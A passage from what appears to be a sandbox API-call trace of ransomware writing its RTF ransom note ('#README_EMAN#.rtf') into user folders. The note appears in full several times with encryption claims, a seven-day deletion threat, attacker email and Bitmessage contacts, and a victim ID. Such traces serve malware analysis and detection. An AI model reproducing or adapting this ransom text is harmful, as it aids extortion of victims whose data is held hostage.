w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.105] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.106] CloseHandle (hObject=0x2ec) returned 1 [0291.106] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0291.106] GetLastError () returned 0x2 [0291.106] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 